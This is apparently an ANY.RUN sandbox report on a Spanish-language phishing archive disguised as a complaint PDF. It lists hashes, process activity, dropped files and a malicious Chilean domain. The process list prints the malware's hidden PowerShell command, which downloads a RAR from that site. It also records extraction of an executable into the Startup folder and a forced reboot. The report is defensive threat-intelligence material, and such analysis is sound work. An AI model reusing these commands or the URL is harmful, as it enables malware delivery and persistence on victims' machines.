analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Denuncia_Activa_2019.zip

Full analysis: https://app.any.run/tasks/a9f3deef-6404-47e7-b15e-fee074dc2738
Verdict: Malicious activity
Analysis date: March 21, 2019, 21:25:09
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Indicators:
MIME: application/zip
File info: Zip multi-volume archive data, at least PKZIP v2.50 to extract
MD5:

32115E0D6B6EB32518DEFD936B25F97D

SHA1:

00C39BD8127C763F471728FF477EF1B48FC35ACB

SHA256:

35998E3024D31203BC55D15AC9AFEA81F77E6F5D463D982BBDE9523CB9DF5644

SSDEEP:

24:ZghpegV86FZn94+6bDu/1e9IPB3eAMxwu3+rze/UGWvnZzeMOhp2cl:ZspeA5FZnkbDC53e7O28G6n2pJ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Writes to a start menu file

      • WinRAR.exe (PID: 688)
    • Executes PowerShell scripts

      • cmd.exe (PID: 2240)
    • Runs PING.EXE for delay simulation

      • cmd.exe (PID: 2240)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • WinRAR.exe (PID: 1052)
      • cmd.exe (PID: 928)
    • Creates files in the user directory

      • powershell.exe (PID: 3980)
    • Executable content was dropped or overwritten

      • WinRAR.exe (PID: 688)
  • INFO

    No info indicators.
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.zip | ZIP compressed archive (multivolume) (100)
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
40
Monitored processes
7
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winrar.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe winrar.exe ping.exe no specs shutdown.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1052"C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Denuncia_Activa_2019.zip"C:\Program Files\WinRAR\WinRAR.exeexplorer.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Version:
5.60.0
928cmd /c ""C:\Users\admin\AppData\Local\Temp\Rar$DIa1052.3928\__Denuncia_Activa_CL.PDF.bat" "C:\Windows\system32\cmd.exeWinRAR.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
9009
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
2240C:\Windows\system32\cmd.exe /K "C:\Users\admin\AppData\Local\Temp\Rar$DIa1052.3928\__Denuncia_Activa_CL.PDF.bat" C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3980PowerShell -windowstyle hidden -Command "(New-Object Net.WebClient).DownloadFile('https://www.triosalud.cl/wp/wp-content/uploads/2019/02/denuncias.rar','C:\Users\admin\Downloads\pmlgko0Qt.rar'); $Shell = New-Object -Com Shell.Application; $Zip = $Shell.NameSpace('C:\Users\admin\Downloads');C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
688"C:\Program Files\WinRAR\winRar.exe" x -y -c "C:\Users\admin\Downloads\pmlgko0Qt.rar" "C:\Users\admin\Downloads"C:\Program Files\WinRAR\WinRAR.exe
cmd.exe
User:
admin
Company:
Alexander Roshal
Integrity Level:
MEDIUM
Description:
WinRAR archiver
Exit code:
0
Version:
5.60.0
4044ping 127.0.0.1 -n 1 C:\Windows\system32\PING.EXEcmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
TCP/IP Ping Command
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
1908shutdown -rC:\Windows\system32\shutdown.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Shutdown and Annotation Tool
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
989
Read events
889
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
3
Text files
3
Unknown types
0

Dropped files

PID
Process
Filename
Type
3980powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9HB5J59QK7DNJ7FLFM2A.temp
MD5:
SHA256:
3980powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:7100C9D54A32DFE02751A9E1BC41F804
SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
1052WinRAR.exeC:\Users\admin\AppData\Local\Temp\Rar$DIa1052.3928\__Denuncia_Activa_CL.PDF.battext
MD5:1E541B14B531BCAC70E77A012B0F0F7F
SHA256:9008B75AC8BBAACBDA0DC47BB7D631F1C791CB346CC6F6A911E7993DA0834C09
3980powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RFfbb96.TMPbinary
MD5:7100C9D54A32DFE02751A9E1BC41F804
SHA256:80122C0BA2B02BE359C80E807AC522D838DB909ED232DFD076AD9B65F7FE699C
688WinRAR.exeC:\Users\admin\AppData\Local\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Integrity.exeexecutable
MD5:410B77D8F1CDC76C867B4A6A27AE55E5
SHA256:421448D92A6D871B218673025D4E4E121E263262F0CB5CD51E30853E2F8F04D7
3980powershell.exeC:\Users\admin\Downloads\pmlgko0Qt.rarcompressed
MD5:AAFB4D8EBF63B50D80DAFF778226F7BC
SHA256:B5A84E8079DC8558D3960D711D8591500B69CF79E750ECAF88919E398C59383F
688WinRAR.exeC:\Users\admin\Downloads\hello.txttext
MD5:49C5DDEBFDC0862208A6859B757DBB81
SHA256:3C304DFF4CFAD593CE554D39EA6EA589B5E20A7831924CE0BD83539498C8E34D
688WinRAR.exeC:\Users\admin\Downloads\world.txttext
MD5:6E0D9920A8BA481D13EEB355147B13F3
SHA256:ED428CE14DC2EE5FCDEB3AD11E8DC315858F73BE187A4B072246B1B8662030A2
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
1
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3980
powershell.exe
190.107.177.246:443
www.triosalud.cl
Gtd Internet S.A.
CL
malicious

DNS requests

Domain
IP
Reputation
www.triosalud.cl
  • 190.107.177.246
malicious

Threats

No threats detected
No debug info